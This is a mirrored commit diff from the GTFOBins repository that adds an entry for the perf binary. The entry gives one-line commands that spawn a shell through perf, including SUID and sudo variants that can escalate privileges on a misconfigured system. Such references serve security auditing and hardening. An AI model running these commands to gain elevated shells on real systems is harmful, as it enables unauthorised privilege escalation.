mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 04:05:40 +02:00
12
_gtfobins/perf.md
Normal file
12
_gtfobins/perf.md
Normal file
@@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
perf stat /bin/sh
|
||||
suid:
|
||||
- code: |
|
||||
./perf stat /bin/sh -p
|
||||
sudo:
|
||||
- code: |
|
||||
sudo perf stat /bin/sh
|
||||
---
|
Reference in New Issue
Block a user